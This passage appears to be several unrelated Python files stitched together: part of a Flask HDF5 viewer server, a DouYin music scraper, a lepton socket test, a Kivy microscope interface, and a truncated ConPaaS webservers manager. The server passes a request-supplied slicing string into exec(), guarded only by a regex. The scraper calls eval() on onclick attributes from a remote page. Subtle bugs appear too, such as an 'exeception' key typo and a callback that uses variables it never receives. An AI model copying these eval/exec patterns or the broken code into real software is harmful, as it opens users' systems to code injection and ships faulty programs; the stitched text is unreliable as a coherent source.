fns_dirs_queue = queue.get()
p.join()
# user can't read the directory requested
if "exeception" in fns_dirs_queue.keys():
print("\n\n Exception \n\n")
r.append('Could not load directory: %s' % (str(fns_dirs_queue["exception"])))
else:
fns, dirs = fns_dirs_queue["fns"], fns_dirs_queue["dirs"]
r = ['<ul class="jqueryFileTree" style="display: none;">']
for f in dirs:
ff = os.path.join(d, f)
r.append('<li class="directory collapsed">' \
'<a href="#" rel="%s/">%s</a></li>' % (ff, f))
for f in fns:
ff = os.path.join(d, f)
e = os.path.splitext(f)[1][1:] # get .ext and remove dot
r.append('<li class="file ext_%s">' \
'<a href="#" rel="%s">%s</a></li>' % (e, ff, f))
r.append('</ul>')
resp = Response(''.join(r))
# resp.headers['Access-Control-Allow-Origin'] = "*"
return resp
# Load h5 files
@app.route('/loadH5File', methods=['POST'])
def loadH5File():
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
# read file using multiprocessing
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=read_h5_target, args=(filepath, user_name, queue))
p.start()
p.join() # here I must call join before queue.get(), not clear why ...
hf_dict = queue.get()
return json.dumps({'filepath':filepath,
'hf_name':hf_dict[filepath]['hf_name'],
'hf_root_items':hf_dict[filepath]['hf_root_items'],
'hf_new_items':hf_dict[filepath]['hf_new_items'],
'root_properties':hf_dict[filepath]['root_properties']
})
# Close h5 file -> delete node from tree, remove dictionary key and content of selected file
@app.route('/closeH5File', methods=['POST'])
def closeH5File():
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
return ''
# Expand/Update the h5 Tree
@app.route('/h5TreeUpdate', methods=['POST', 'GET'])
def h5TreeUpdate():
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=expand_tree_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
hf_new_items = queue.get()
p.join()
return json.dumps({'filepath': filepath,
'hf_new_items':hf_new_items
})
@app.route('/raw', methods=['GET', 'POST'])
def raw():
if request.method == 'POST':
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=bokeh_table_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
bokeh_json_item_tables = queue.get()
p.join() # here I must call join after queue.get(), not clear why ...
return json.dumps(bokeh_json_item_tables)
@app.route('/curve', methods=['GET', 'POST'])
def curve():
if request.method == 'POST':
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=bokeh_plot_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
bokeh_json_item_plots = queue.get()
p.join() # here I must call join after queue.get(), not clear why ...
return json.dumps(bokeh_json_item_plots)
@app.route('/image', methods=['GET', 'POST'])
def image():
if request.method == 'POST':
user_name = str(request.form['username']).strip()
filepath = str(request.form['filepath']).strip()
node_selected = str(request.form['node']).strip()
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=bokeh_image_target,
args=(user_name,
filepath,
node_selected,
queue)
)
p.start()
bokeh_json_item_images = queue.get()
p.join() # here I must call join after queue.get(), not clear why ...
return json.dumps(bokeh_json_item_images)
@app.route('/logout', methods=['GET','POST'])
def logout():
user_name = str(request.form['username']).strip()
return ''
# return redirect('https://vuo.elettra.eu/pls/vuo/guest.startup')
def geth5dset_target( user_name, queue, h5fn, dsetname, slicing='[:]' ):
uid = pwd.getpwnam(user_name).pw_uid
os.setuid(uid)
try:
exec( 'with h5.File(h5fn) as hf: d = hf[ dsetname ]%s'%slicing )
data = {'dbytes':d.tobytes(),
'dinfo':{'Content-type': 'application/octet-stream',
'shape': d.shape,
'dtype': d.dtype}
}
queue.put(data)
except Exception as ex:
data = {'dbytes':"An exception of type %s occurred: %s"%(ex.__class__.__name__, ex.args),
'dinfo':{'Content-type': 'application/octet-stream',
'shape': '',
'dtype': ''}
}
queue.put(data)
def parsepathstr( pathstr, h5ext='.h5' ):
h5fn = '/' + pathstr.rsplit(h5ext,1)[0] + h5ext
dsetnameslicing = pathstr.rsplit(h5ext,1)[-1]
dsetname = dsetnameslicing.split('[',1)[0]
slicing = dsetnameslicing.replace(dsetname,'')
if slicing == '' :
slicing = '[:]'
return h5fn, dsetname, slicing
@app.route('/h5data/<path:filepath>', methods=['POST'])
def h5data(filepath):
# get HDF5 file extension
h5ext = str(request.form['ext']).strip()
# get vuo session from POST request
vuo_session_cookie = str(request.form['vuotoken']).strip()
# verify if vuo session is valid
response_vuo = get_vuo_user(vuo_session_cookie)
if response_vuo['status'] == 'OK': # if valid vuo session, retrieve data
user_name = response_vuo['unix_user_name']
h5fn, dsetname, slicing = parsepathstr( filepath, h5ext=h5ext )
# check slicing string with regex
# r = re.search('^\[(?:-?\d)*:(?:-?\d)*(?:,\s?(?:-?\d)*:(?:-?\d)*)*\]$',
# slicing)
r = re.search('^\[(?:-?\d)*:?(?:-?\d)*(?:,\s?(?:-?\d)*:?(?:-?\d)*)*\]$',
slicing)
if r: # if it matches the expected pattern
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=geth5dset_target,
args=(user_name,
queue,
h5fn,
dsetname,
slicing)
)
p.start()
data = queue.get() # {'dbytes':dbytes, 'dinfo':{} }
p.join()
resp = Response(data['dbytes']) # response content
resp.headers['Content-type'] = data['dinfo']['Content-type']
resp.headers['shape'] = data['dinfo']['shape']
resp.headers['dtype'] = data['dinfo']['dtype']
return resp
else:
resp = Response("NOT a valid slicing string!")
return resp
else:
print("NOT a valid session on VUO! Please log in.")
resp = Response("NOT a valid session on VUO! Please log in.")
return resp
##########################################################################
#
# Configure https/certificate | ssl_context
#
if has_ssl_context:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_verify_locations(locations_crt)
context.load_cert_chain(users_nuvola_crt, users_nuvola_key)
else:
context = None
app.run(host=host, port=port, debug=debug, ssl_context=context)
|
DouYinHotMusic.py
|
# -*- coding: utf-8 -*-
# @Author : 王翔
# @JianShu : 清风Python
# @Date : 2019/7/31 23:25
# @Software : PyCharm
# @version :Python 3.7.3
# @File : DouYinMusic.py
import os
from bs4 import BeautifulSoup
import threading
import time
# 系统层级的判断正则表达式的类
import re
# 大名鼎鼎的网络请求库
import requests
class DouYinMusic:
def __init__(self):
self.music_list = []
self.path = self.download_path()
@staticmethod
def download_path():
"""
获取代码执行目录,并在目录下创建Music文件夹
:return Music文件夹全路径
"""
base_dir = os.path.dirname(os.path.abspath(__file__))
_path = os.path.join(base_dir, "Music")
if not os.path.exists(_path):
os.mkdir(_path)
print(_path)
return _path
def get_request(self, url):
"""
封装requests.get方法
如果为网页请求,返回网页内容
否则,解析音乐地址,并返回音乐二进制文件
:param url: 请求url(分网页、音乐两类)
:return: 网页内容 & 音乐二进制文件
"""
r = requests.get(url, timeout=5)
if url.endswith('html'):
return r.text
else:
return r.content
def analysis_html(self, html):
"""
根据获取的网页内容,解析音乐名称、下载地址
调用音乐下载方法
:param html: 网页内容
"""
soup = BeautifulSoup(html, 'lxml')
# 根据关键字onclick查找每个下载地址
for tag_a in soup.findAll('a', attrs={'onclick': True}):
# 下载格式'("name","link","")',通过eval将str转化为tuple类型
link_list = eval(tag_a['onclick'][5:])
music_name, music_link = link_list[:2]
# 因为存在部分重复音乐,故设置判断下载过的音乐跳过
if music_name in self.music_list:
continue
self.music_list.append(music_name)
t = threading.Thread(target=self.download_music, args=(music_name, music_link))
time.sleep(0.5)
t.start()
def download_music(self, music_name, music_link):
"""
解析音乐文件,完成音乐下载
:param music_name: 音乐名称
:param music_link: 下载地址
"""
_full_name = os.path.join(self.path, music_name)
with open(_full_name + '.mp3', 'wb') as f:
f.write(self.get_request(music_link))
print("抖音音乐:{} 下载完成".format(music_name))
def run(self):
"""
主方法,用于批量生成url
"""
for page in range(1,55):
url = "http://douyin.bm8.com.cn/t_{}.html".format(page)
html = self.get_request(url)
self.analysis_html(html)
if __name__ == '__main__':
main = DouYinMusic()
main.run()
def getWeiXinAppStoreInfo():
url = "http://itunes.apple.com/cn/lookup?id=414478124"
# 下面这个网址获取不到什么有价值的信息
# url = "https://apps.apple.com/cn/app/%E5%BE%AE%E4%BF%A1/id414478124"
# 请求回来的响应
response = requests.get(url)
# 响应的网页字符串
text = response.text
print(text)
def getPages() -> int:
url = "有效网址"
# 请求回来的响应
response = requests.get(url)
# 响应的网页字符串
text = response.text
# 获取网页字符串中匹配的信息
result = re.findall(r'>第 1 页,共 ([1-9]\d+) 页</span>', text, re.I)
# 返回结果的第一次出现的值,也就是总页数
return int(result[0])
|
sockettester.py
|
#!/usr/bin/env python
import subprocess
import sys
import threading
import socket
import time
import os
import uuid
import argparse
import zlib
base_dir = os.path.dirname(sys.argv[0])
parser = argparse.ArgumentParser(description='Benchmark and test socket server for compression')
parser.add_argument('files', metavar='N', type=str, nargs='*', default=[os.path.join(base_dir,
"..", "images", "iphone.jpg")])
parser.add_argument('--benchmark', dest='benchmark', action='store_true')
parser.add_argument('--bench', dest='benchmark', action='store_true')
parser.add_argument('-benchmark', dest='benchmark', action='store_true')
parser.add_argument('-bench', dest='benchmark', action='store_true')
parser.add_argument('--singlethread', dest='singlethread', action='store_true')
parser.add_argument('-singlethread', dest='singlethread', action='store_true')
parser.set_defaults(benchmark=False)
parser.set_defaults(singlethread=False)
parsed_args = parser.parse_args()
jpg_name = parsed_args.files[0]
def read_all_sock(sock):
datas = []
while True:
try:
datas.append(os.read(sock.fileno(), 1048576))
if len(datas[-1]) == 0:
break
except OSError:
pass
return b''.join(datas)
def test_compression(binary_name, socket_name = None, too_short_time_bound=False, is_zlib=False):
global jpg_name
custom_name = socket_name is not None
xargs = [binary_name,
'-socket',
'-timebound=10ms' if too_short_time_bound else '-timebound=50000ms',
'-preload']
if socket_name is not None:
xargs[1]+= '=' + socket_name
if parsed_args.singlethread:
xargs.append('-singlethread')
proc = subprocess.Popen(xargs,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
try:
socket_name = proc.stdout.readline().strip()
if custom_name:
# test that we are unable to connect to the subprocess
dup_proc = subprocess.Popen(xargs,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
duplicate_socket_name = b''
duplicate_socket_name = dup_proc.stdout.readline().strip()
assert (not duplicate_socket_name)
if is_zlib:
socket_name = socket_name.replace(b'.uport', b'') + b'.z0'
with open(jpg_name, 'rb') as f:
jpg = f.read()
def encoder():
try:
lepton_socket.sendall(jpg)
lepton_socket.shutdown(socket.SHUT_WR)
except EnvironmentError:
pass
def decoder():
try:
lepton_socket.sendall(dat)
lepton_socket.shutdown(socket.SHUT_WR)
except EnvironmentError:
pass
t=threading.Thread(target=encoder)
encode_start = time.time()
lepton_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
lepton_socket.connect(socket_name)
t.start()
dat = read_all_sock(lepton_socket)
encode_end = time.time()
lepton_socket.close()
t.join()
print ('encode time ',encode_end - encode_start)
print (len(jpg),len(dat))
while True:
v=threading.Thread(target=decoder)
decode_start = time.time()
lepton_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
os.listdir('/tmp')
lepton_socket.connect(socket_name)
v.start()
decode_mid = time.time()
ojpg = read_all_sock(lepton_socket)
decode_end = time.time()
lepton_socket.close()
v.join()
if is_zlib:
ojpg = zlib.decompress(ojpg)
print (len(ojpg))
print (len(jpg))
assert (ojpg == jpg)
print ('decode time ',decode_end - decode_start, '(', decode_mid-decode_start,')')
if not parsed_args.benchmark:
break
print ('yay',len(ojpg),len(dat),len(dat)/float(len(ojpg)), 'parent pid is ',proc.pid)
finally:
proc.terminate()
proc.wait()
assert (not os.path.exists(socket_name))
has_avx2 = False
try:
cpuinfo = open('/proc/cpuinfo')
has_avx2 = 'avx2' in cpuinfo.read()
except Exception:
pass
if has_avx2 and os.path.exists('lepton-avx'):
test_compression('./lepton-avx')
elif parsed_args.benchmark:
test_compression('./lepton')
if not parsed_args.benchmark:
test_compression('./lepton')
test_compression('./lepton', is_zlib=True)
test_compression('./lepton', '/tmp/' + str(uuid.uuid4()))
test_compression('./lepton', '/tmp/' + str(uuid.uuid4()), is_zlib=True)
ok = False
try:
test_compression('./lepton', '/tmp/' + str(uuid.uuid4()), True)
except (AssertionError, EnvironmentError):
ok = True
finally:
assert (ok and "the time bound must stop the process")
print ("SUCCESS DONE")
|
userInterface.py
|
# Authors: Cicely Motamedi, Adam Robinson
# Description: This file contains the main code for the microscope user interface.
# Some of the more complicated functionality is found in other files.
from kivy.app import App
from kivy.uix.scatter import Scatter
from kivy.uix.label import Label
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.textinput import TextInput
from kivy.uix.accordion import Accordion, AccordionItem
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.image import AsyncImage
from kivy.uix.slider import Slider
from kivy.config import Config
from kivy.core.window import Window
from kivy.clock import Clock
from threading import Thread
from kivy.uix.gridlayout import GridLayout
import sys
sys.path.append("..\\src")
from MicroscopeControl import MicroscopeController
from CustomBoxLayout import CustomBoxLayout
from ImageDisplay import ImageDisplay
import numpy as np
class accordionWidget(Accordion):
def __init__(self, *args, **kwargs):
kwargs['orientation'] = 'vertical'
kwargs['size_hint_x'] = 2
super(accordionWidget, self).__init__(*args, **kwargs)
#root = Accordion(orientation='vertical', size_hint_x=2)
item1 = AccordionItem(title='Camera')
item1.add_widget(Slider(min=-100, max=100, value=25))
self.add_widget(item1)
item2 = AccordionItem(title='Zoom and Focus')
box2 = BoxLayout(orientation='vertical')
instructions = Label(text='Enter a value between 0 and 1',size_hint_y=1)
box2.add_widget(instructions)
label1 = BoxLayout(orientation='horizontal',size_hint_y=1)
zoomLabel = Label(text='Zoom',size_hint_x=None,width=100, size_hint_y=None, height=40)
ZminusButton = Button(text='-',size_hint_x=None,width=30,size_hint_y=None,height=40)
self.zoomInput = TextInput(text='0.005',multiline=False,size_hint_x=None,width=100,size_hint_y=None,height=40)
ZplusButton = Button(text='+',size_hint_x=None,width=30,size_hint_y=None,height=40)
label1.add_widget(zoomLabel)
label1.add_widget(ZminusButton)
label1.add_widget(self.zoomInput)
label1.add_widget(ZplusButton)
box2.add_widget(label1)
self.zoomInput.bind(on_text_validate=self.setZoom)
ZminusButton.bind(on_release=self.incrementZoomMinus)
ZplusButton.bind(on_release=self.incrementZoomPlus)
instructions2 = Label(text='Enter a value between 0 and 1',size_hint_y=1)
box2.add_widget(instructions2)
label2 = BoxLayout(orientation='horizontal',size_hint_y=1)
focusLabel = Label(text='Focus',size_hint_x=None, width=100,size_hint_y=None,height=40)
FminusButton = Button(text='-',size_hint_x=None,width=30,size_hint_y=None,height=40)
self.focusInput = TextInput(text='0.005',multiline=False,size_hint_x=None,width=100,size_hint_y=None,height=40)
FplusButton = Button(text='+',size_hint_x=None,width=30,size_hint_y=None,height=40)
box2.add_widget(label2)
label2.add_widget(focusLabel)
label2.add_widget(FminusButton)
label2.add_widget(self.focusInput)
label2.add_widget(FplusButton)
self.focusInput.bind(on_text_validate=self.setFocus)
FminusButton.bind(on_release=self.incrementFocusMinus)
FplusButton.bind(on_release=self.incrementFocusPlus)
item2.add_widget(box2)
self.add_widget(item2)
item3 = AccordionItem(title='Stage Control')
gridLayout = GridLayout(cols=3)
gridLayout.add_widget(Button(opacity=0))
moveUp = Button(text='Up')
gridLayout.add_widget(moveUp)
gridLayout.add_widget(Button(opacity=0))
moveLeft = Button(text='Left')
gridLayout.add_widget(moveLeft)
gridLayout.add_widget(Button(opacity=0))
moveRight = Button(text='Right')
gridLayout.add_widget(moveRight)
gridLayout.add_widget(Button(opacity=0))
moveDown = Button(text='Down')
gridLayout.add_widget(moveDown)
gridLayout.add_widget(Button(opacity=0))
moveUp.bind(on_press=self.clockMoveUp)
moveUp.bind(on_release=self.stopClock)
item3.add_widget(gridLayout)
self.add_widget(item3)
item4 = AccordionItem(title='Image Settings')
item4.add_widget(Slider(min=-100, max=100, value=25))
self.add_widget(item4)
self.microscope = None
# self.zooming = False
# self.zoom_value = 0.5
# self.closing = False
# self.zoom_thread = Thread(target=self.adjustZoom)
# self.zoom_thread.start()
# self.focusing = False
# self.focus_value = 0.5
# self.focus_thread = Thread(target=self.adjustFocus)
# self.focus_thread.start()
def close(self):
pass
# def adjustZoom(self):
# while not self.closing:
# if self.microscope is not None and not self.zooming:
# current = self.microscope.focus.getZoom()
# if np.abs(current - self.zoom_value) > 0.005 and not self.zooming:
# def done():
# self.zooming = False
# self.zooming = True
# self.microscope.focus.setZoom(self.zoom_value, corrected=False, callback=done)
def setZoom(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting zoom")
#print(dir(object))
value = object.text
print(value)
try:
value = float(value)
except Exception as ex:
return
if value >= 0.005 and value <= 0.995:
print(value)
self.microscope.focus.setZoom(value, corrected=False, cb=done)
else:
print("Invalid input")
# def adjustFocus(self):
# while not self.closing:
# if self.microscope is not None and not self.focusing:
# current = self.microscope.focus.getFocus()
# if np.abs(current - self.focus_value) > 0.005 and not self.focusing:
# def done():
# self.focusing = False
# self.focusing = True
# self.microscope.focus.setFocus(self.focus_value, corrected=False, callback=done)
def setFocus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = object.text
print(value)
try:
value=float(value)
except Exception as ex:
return
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setFocus(value, corrected=False, cb=done)
else:
print("Invalid input")
def setMicroscope(self, ms):
self.microscope = ms
def incrementZoomMinus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.zoomInput.text)
value -= 0.1
self.zoomInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setZoom(value, corrected=False, cb=done)
else:
print("Invalid input")
def incrementZoomPlus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.zoomInput.text)
value += 0.1
self.zoomInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setZoom(value, corrected=False, cb=done)
else:
print("Invalid input")
def incrementFocusMinus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.focusInput.text)
value -= 0.1
self.focusInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setFocus(value, corrected=False, cb=done)
else:
print("Invalid input")
def incrementFocusPlus(self, object):
def done(error, val):
if error is None:
print(val)
else:
print("Error setting focus")
value = float(self.focusInput.text)
value += 0.1
self.focusInput.text = "%1.4f"%value
if value >= 0.005 and value <= 0.995:
self.microscope.focus.setFocus(value, corrected=False, cb=done)
else:
print("Invalid input")
def moveIncrementUp(self,a):
def done(error, value):
if error is None:
print(value)
else:
print(error)
self.microscope.stage.moveDelta(0, 0.01, cb=done)
def clockMoveUp(self,a):
Clock.schedule_interval(self.moveIncrementUp,0.01)
def stopClock(self, a):
Clock.unschedule(self.moveIncrementUp)
class userInterface(BoxLayout):
def initializeMicroscope(self):
self.microscope = MicroscopeController()
def close(self):
self.accordion.close()
if self.microscope is not None:
self.microscope.cleanup()
def __init__(self, **kwargs):
kwargs['orientation'] = 'horizontal'
super(userInterface, self).__init__(**kwargs)
self.accordion = accordionWidget()
self.add_widget(self.accordion)
self.display = BoxLayout(orientation='vertical', size_hint_x=4)
self.microscope = None
Thread(target=self.initializeMicroscope).start()
self.microscope_loaded = False
def checkMicroscope(a):
if not self.microscope_loaded and self.microscope is not None:
self.microscope_loaded = True
self.microscope.camera.enableLowRes()
self.accordion.setMicroscope(self.microscope)
self.microscope.camera.startCapture()
if self.microscope_loaded:
img = self.microscope.camera.getFrame()
img = np.rot90(img, 3, axes=(0, 1))
img = np.flipud(img)
self.image_display.setImage(img)
Clock.schedule_interval(checkMicroscope, 1 / 10)
# def _check_process(b):
# self.load_progress.value = self.current_progress
# if not t.is_alive():
# Clock.unschedule(_check_process)
# self.load_progress.opacity = 0
# self._parent_obj.interface.preview_pane.loadThumbnails(
# self._parent_obj.dataset
# )
# Clock.schedule_interval(_check_process, .025)
# self.display.add_widget(
# AsyncImage(source="https://images.squarespace-cdn.com/content/v1/5a5906400abd0406785519dd/1552662149940-G6MMFW3JC2J61UBPROJ5/ke17ZwdGBToddI8pDm48kLkXF2pIyv_F2eUT9F60jBl7gQa3H78H3Y0txjaiv_0fDoOvxcdMmMKkDsyUqMSsMWxHk725yiiHCCLfrh8O1z4YTzHvnKhyp6Da-NYroOW3ZGjoBKy3azqku80C789l0iyqMbMesKd95J-X4EagrgU9L3Sa3U8cogeb0tjXbfawd0urKshkc5MgdBeJmALQKw/baelen.jpg?format=1500w",size_hint_y=10)
# )
self.image_display = ImageDisplay(orientation='vertical', size_hint_y=10)
self.display.add_widget(self.image_display)
img = np.random.normal(0.0, 127, (1024, 1024, 3)).astype(np.uint8)
self.image_display.setImage(img)
self.input1 = BoxLayout(orientation='horizontal',size_hint_y=None, height=30)
xLabel = Label(text='X=',size_hint_x=1, size_hint_y=None, height=30)
self.xInput = TextInput(multiline=False,size_hint_x=4, size_hint_y=None, height=30)
yLabel = Label(text='Y=',size_hint_x=1, size_hint_y=None, height=30)
self.yInput = TextInput(multiline=False,size_hint_x=4, size_hint_y=None, height=30)
self.input1.add_widget(xLabel)
self.input1.add_widget(self.xInput)
#self.input2 = BoxLayout(orientation='horizontal',size_hint_y=1)
self.input1.add_widget(yLabel)
self.input1.add_widget(self.yInput)
self.add_widget(self.display)
self.display.add_widget(self.input1)
#self.display.add_widget(self.input2)
self.yInput.bind(on_text_validate=self.moveTo)
self.xInput.bind(on_text_validate=self.moveTo)
def moveTo(self, object):
def done():
if error is None:
print(val)
else:
print("Error moving stage")
xvalue = self.xInput.text
yvalue = self.yInput.text
print(xvalue, yvalue)
if xvalue.strip() == "" or xvalue is None:
xvalue = "0.0"
if yvalue.strip() == "" or yvalue is None:
yvalue = "0.0"
try:
xvalue=float(xvalue)
yvalue=float(yvalue)
except Exception as ex:
return
print(xvalue, yvalue)
if xvalue >= -50 and xvalue <= 50:
if yvalue >= -44 and yvalue <= 37:
self.microscope.stage.moveTo(xvalue, yvalue, callback=done)
else:
print("Invalid input")
class userInterfaceApp(App):
def on_request_close(self, *args):
print("close called")
self.interface.close()
return False
def build(self):
self.interface = userInterface()
Window.bind(on_request_close=self.on_request_close)
return self.interface
if __name__=="__main__":
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
userInterfaceApp().run()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
import memcache, tempfile, os, os.path, time
from conpaas.services.webservers.agent import client
from conpaas.services.webservers.manager.config import WebServiceNode, CodeVersion
from conpaas.services.webservers.misc import archive_open, archive_get_members, archive_close,\
archive_get_type
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse,\
HttpFileDownloadResponse, FileUploadField
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core import git
class BasicWebserversManager(BaseManager):
# memcache keys
CONFIG = 'config'
DEPLOYMENT_STATE = 'deployment_state'
def __init__(self, config_parser):
BaseManager.__init__(self, config_parser)
self.controller.generate_context('web')
self.memcache = memcache.Client([config_parser.get('manager', 'MEMCACHE_ADDR')])
from conpaas.services.webservers.manager import config
config.memcache = self.memcache
self.code_repo = config_parser.get('manager', 'CODE_REPO')
self.state_log = []
def _state_get(self):
return self.memcache.get(self.DEPLOYMENT_STATE)
def _state_set(self, target_state, msg=''):
self.memcache.set(self.DEPLOYMENT_STATE, target_state)
self.state_log.append({'time': time.time(), 'state': target_state, 'reason': msg})
self.logger.debug('STATE %s: %s' % (target_state, msg))
def _configuration_get(self):
return self.memcache.get(self.CONFIG)
def _configuration_set(self, config):
self.memcache.set(self.CONFIG, config)
def _adapting_set_count(self, count):
self.memcache.set('adapting_count', count)
def _adapting_get_count(self):
return self.memcache.get('adapting_count')
def _stop_proxy(self, config, nodes):
for serviceNode in nodes:
try: client.stopHttpProxy(serviceNode.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop proxy at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to stop proxy at node %s' % str(serviceNode))
raise
def _start_web(self, config, nodes):
if config.prevCodeVersion == None:
code_versions = [config.currentCodeVersion]
else:
code_versions = [config.currentCodeVersion, config.prevCodeVersion]
for serviceNode in nodes:
try:
client.createWebServer(serviceNode.ip, 5555,
config.web_config.port,
code_versions)
except client.AgentException:
self.logger.exception('Failed to start web at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to start web at node %s' % str(serviceNode))
raise
def _update_web(self, config, nodes):
if config.prevCodeVersion == None:
code_versions = [config.currentCodeVersion]
else:
code_versions = [config.currentCodeVersion, config.prevCodeVersion]
for webNode in nodes:
try: client.updateWebServer(webNode.ip, 5555,
config.web_config.port,
code_versions)
except client.AgentException:
self.logger.exception('Failed to update web at node %s' % str(webNode))
self._state_set(self.S_ERROR, msg='Failed to update web at node %s' % str(webNode))
raise
def _stop_web(self, config, nodes):
for serviceNode in nodes:
try: client.stopWebServer(serviceNode.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop web at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to stop web at node %s' % str(serviceNode))
raise
@expose('POST')
def startup(self, kwargs):
config = self._configuration_get()
dstate = self._state_get()
if dstate != self.S_INIT and dstate != self.S_STOPPED:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
if config.proxy_count == 1 \
and (config.web_count == 0 or config.backend_count == 0):# at least one is packed
if config.web_count == 0 and config.backend_count == 0:# packed
serviceNodeKwargs = [ {'runProxy':True, 'runWeb':True, 'runBackend':True} ]
elif config.web_count == 0 and config.backend_count > 0:# web packed, backend separated
serviceNodeKwargs = [ {'runBackend':True} for _ in range(config.backend_count) ]
serviceNodeKwargs.append({'runProxy':True, 'runWeb':True})
elif config.web_count > 0 and config.backend_count == 0:# proxy separated, backend packed
serviceNodeKwargs = [ {'runWeb':True} for _ in range(config.web_count) ]
serviceNodeKwargs.append({'runProxy':True, 'runBackend':True})
else:
if config.web_count < 1: config.web_count = 1 # have to have at least one web
if config.backend_count < 1: config.backend_count = 1 # have to have at least one backend
serviceNodeKwargs = [ {'runProxy':True} for _ in range(config.proxy_count) ]
serviceNodeKwargs.extend([ {'runWeb':True} for _ in range(config.web_count) ])
serviceNodeKwargs.extend([ {'runBackend':True} for _ in range(config.backend_count) ])
self._state_set(self.S_PROLOGUE, msg='Starting up')
kwargs['config'] = config
kwargs['serviceNodeKwargs'] = serviceNodeKwargs
Thread(target=self.do_startup, kwargs=kwargs).start()
return HttpJsonResponse({'state': self.S_PROLOGUE})
@expose('POST')
def shutdown(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
dstate = self._state_get()
if dstate != self.S_RUNNING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
config = self._configuration_get()
self._state_set(self.S_EPILOGUE, msg='Shutting down')
Thread(target=self.do_shutdown, args=[config]).start()
return HttpJsonResponse({'state': self.S_EPILOGUE})
def do_startup(self, config, serviceNodeKwargs, cloud):
self.logger.debug('do_startup: Going to request %d new nodes' % len(serviceNodeKwargs))
try:
cloud = self._init_cloud(cloud)
except Exception:
self.logger.exception("A cloud named '%s' could not be found" % cloud)
self._state_set(self.S_STOPPED, msg='Unknown cloud: %s' % cloud)
return
try:
self._adapting_set_count(len(serviceNodeKwargs))
node_instances = self.controller.create_nodes(len(serviceNodeKwargs),
client.check_agent_process, 5555, cloud)
except:
self.logger.exception('do_startup: Failed to request new nodes. Needed %d' % (len(serviceNodeKwargs)))
self._state_set(self.S_STOPPED, msg='Failed to request new nodes')
return
finally:
self._adapting_set_count(0)
config.serviceNodes.clear()
i = 0
for kwargs in serviceNodeKwargs:
config.serviceNodes[node_instances[i].id] = WebServiceNode(node_instances[i], **kwargs)
i += 1
config.update_mappings()
# issue orders to agents to start PHP inside
self._start_backend(config, config.getBackendServiceNodes())
# stage the code files
# NOTE: Code update is done after starting the backend
# because tomcat-create-instance complains if its
# directory exists when it is run and placing the
# code can only be done after creating the instance
if config.currentCodeVersion != None:
self._update_code(config, config.serviceNodes.values())
# issue orders to agents to start web servers inside
self._start_web(config, config.getWebServiceNodes())
# issue orders to agents to start proxy inside
self._start_proxy(config, config.getProxyServiceNodes())
self._configuration_set(config) # update configuration
self._state_set(self.S_RUNNING)
self.memcache.set('nodes_additional', [])
def do_shutdown(self, config):
self._stop_proxy(config, config.getProxyServiceNodes())
self._stop_web(config, config.getWebServiceNodes())
self._stop_backend(config, config.getBackendServiceNodes())
self.controller.delete_nodes(config.serviceNodes.values())
config.serviceNodes = {}
self._state_set(self.S_STOPPED)
self._configuration_set(config)
@expose('POST')
def add_nodes(self, kwargs):
config = self._configuration_get()
dstate = self._state_get()
if dstate != self.S_RUNNING:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
backend = 0
web = 0
proxy = 0
if 'backend' in kwargs:
if not isinstance(kwargs['backend'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "backend"').message)
backend = int(kwargs.pop('backend'))
if backend < 0: return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected a positive integer value for "backend"').message)
if 'web' in kwargs:
if not isinstance(kwargs['web'], int):
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_INVALID, detail='Expected an integer value for "web"').message)
